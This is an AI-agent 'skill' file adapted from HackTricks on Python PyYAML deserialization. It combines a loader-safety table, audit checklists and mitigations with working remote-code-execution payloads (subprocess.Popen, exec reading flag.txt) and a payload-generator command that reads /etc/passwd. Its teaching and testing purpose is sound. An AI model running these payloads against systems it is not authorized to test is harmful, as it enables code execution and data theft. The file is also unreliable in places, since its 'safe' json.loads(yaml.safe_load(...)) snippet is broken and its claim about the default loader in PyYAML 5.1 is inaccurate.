Hacktricks-skills python-yaml-deserialization

Security skill for understanding, testing, and mitigating Python YAML deserialization vulnerabilities. Use this skill whenever the user mentions YAML deserialization, PyYAML security, Python RCE through YAML, deserialization attacks, or needs to audit code for unsafe yaml.load() usage. Also trigger for requests about safe YAML loading practices, payload generation for authorized security testing, or explaining how !!python/object tags work.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/deserialization/python-yaml-deserialization/SKILL.MD
source content

Python YAML Deserialization Security

This skill helps you understand, test, and mitigate YAML deserialization vulnerabilities in Python applications. Use this for authorized security testing only.

Understanding the Vulnerability

PyYAML can deserialize Python objects, not just raw data. This becomes dangerous when untrusted input is deserialized with unsafe loaders.

How Serialization Works

import yaml

# Raw data - safe
print(yaml.dump(str("lol")))
# Output: lol

# Python objects - DANGEROUS
print(yaml.dump(tuple("lol")))
# Output:
# !!python/tuple
# - l
# - o
# - l

print(yaml.dump(range(1,10)))
# Output:
# !!python/object/apply:builtins.range
# - 1
# - 10
# - 1

The

!!python/
tags indicate Python object serialization, which can execute arbitrary code when deserialized.

Safe vs Unsafe Loaders

FunctionLoaderSafe?Notes
safe_load()
SafeLoader✅ YesOnly basic types
safe_load_all()
SafeLoader✅ YesOnly basic types
load()
(no Loader)
SafeLoader (PyYAML ≥5.1)✅ YesDefault changed in 5.1
load(Loader=Loader)
Loader❌ NoDeserializes objects
load(Loader=UnsafeLoader)
UnsafeLoader❌ NoDeserializes objects
load(Loader=FullLoader)
FullLoader❌ NoDeserializes objects
unsafe_load()
UnsafeLoader❌ NoDeserializes objects
full_load()
FullLoader❌ NoDeserializes objects

Key insight: In PyYAML ≥5.1,

yaml.load()
without a Loader defaults to SafeLoader. But explicitly specifying
Loader
,
UnsafeLoader
, or
FullLoader
enables object deserialization.

Basic Exploits

Simple Command Execution

import yaml
from yaml import UnsafeLoader

# Execute sleep command
data = b'!!python/object/apply:time.sleep [2]'
yaml.load(data, Loader=UnsafeLoader)  # Sleeps for 2 seconds

RCE via Custom Payload

import yaml
import subprocess

class Payload:
    def __reduce__(self):
        return (subprocess.Popen, ('ls',))

# Serialize the payload
serialized = yaml.dump(Payload())
print(serialized)
# Output:
# !!python/object/apply:subprocess.Popen
# - ls

# Deserialize (executes the command)
yaml.load(serialized, Loader=UnsafeLoader)

Legacy Exploit (Old PyYAML Versions)

For PyYAML <5.1 where

yaml.load()
without Loader was vulnerable:

!!python/object/new:str
state: !!python/tuple
  - 'print(getattr(open("flag.txt"), "read")())'
  - !!python/object/new:Warning
    state:
      update: !!python/name:exec

Or the one-liner variant:

!!python/object/new:str {
  state:
    !!python/tuple [
      'print(exec("print(open(\"flag.txt\",\"r\").read())"))',
      !!python/object/new:Warning { state: { update: !!python/name:exec } },
    ],
}

Generating Payloads

Use the

generate_yaml_payload.py
script (bundled with this skill) to create test payloads:

python scripts/generate_yaml_payload.py --command "cat /etc/passwd" --output payload.yaml

Or use the external tool python-deserialization-attack-payload-generator:

python3 peas.py
# Enter RCE command: cat /root/flag.txt
# Enter OS: linux
# Select Module: PyYAML
# Done! Check /tmp/example_yaml

Auditing Code for Vulnerabilities

Vulnerable Patterns

# ❌ VULNERABLE - explicit unsafe loader
yaml.load(data, Loader=UnsafeLoader)
yaml.load(data, Loader=Loader)
yaml.load(data, Loader=FullLoader)

# ❌ VULNERABLE - unsafe functions
yaml.unsafe_load(data)
yaml.full_load(data)

# ❌ VULNERABLE - old PyYAML (<5.1) without Loader
yaml.load(data)  # Only vulnerable in old versions

Safe Patterns

# ✅ SAFE - use safe_load
yaml.safe_load(data)
yaml.safe_load_all(data)

# ✅ SAFE - PyYAML ≥5.1 without Loader (defaults to SafeLoader)
yaml.load(data)  # Only if you control the PyYAML version

# ✅ SAFE - parse as string first, then validate
import json
data = json.loads(yaml.safe_load(raw_input))

Quick Audit Checklist

  1. Search for
    yaml.load(
    in codebase
  2. Check if Loader parameter is specified
  3. If Loader is
    UnsafeLoader
    ,
    Loader
    , or
    FullLoader
    → VULNERABLE
  4. If using
    unsafe_load()
    or
    full_load()
    → VULNERABLE
  5. Check PyYAML version - <5.1 without Loader is vulnerable
  6. Verify all YAML input is from trusted sources

Mitigation Strategies

1. Always Use safe_load()

# Replace all unsafe loading with safe_load
data = yaml.safe_load(file_content)

2. Validate Input Source

# Only deserialize YAML from trusted sources
if source == "internal_config":
    data = yaml.load(content, Loader=Loader)  # OK for trusted data
else:
    data = yaml.safe_load(content)  # Required for untrusted data

3. Use Alternative Formats

Consider JSON for data interchange - it doesn't support object deserialization:

import json

# JSON is inherently safe from deserialization attacks
data = json.loads(json_string)

4. Pin PyYAML Version

# pyproject.toml
[dependencies]
pyyaml = ">=5.1"  # Ensures safe default behavior

Testing Your Application

1. Check for Vulnerable Loaders

grep -r "yaml.load" --include="*.py" .
grep -r "UnsafeLoader" --include="*.py" .
grep -r "FullLoader" --include="*.py" .

2. Test with Payload

# test_yaml_vuln.py
import yaml
from yaml import UnsafeLoader

test_payload = b'!!python/object/apply:time.sleep [1]'

try:
    yaml.load(test_payload, Loader=UnsafeLoader)
    print("VULNERABLE: Object deserialization enabled")
except Exception as e:
    print(f"Safe: {e}")

3. Verify safe_load Works

import yaml

# This should work
safe_data = yaml.safe_load("name: test\nvalue: 123")
print(safe_data)  # {'name': 'test', 'value': 123}

# This should fail
try:
    yaml.safe_load("!!python/object/apply:time.sleep [1]")
except Exception as e:
    print(f"Correctly blocked: {e}")

References

When to Use This Skill

Use this skill when you need to:

  • Audit Python code for YAML deserialization vulnerabilities
  • Generate test payloads for authorized security testing
  • Understand how !!python/object tags work
  • Learn safe YAML loading practices
  • Explain deserialization attacks to stakeholders
  • Convert vulnerable yaml.load() calls to safe alternatives
  • Test applications for RCE via YAML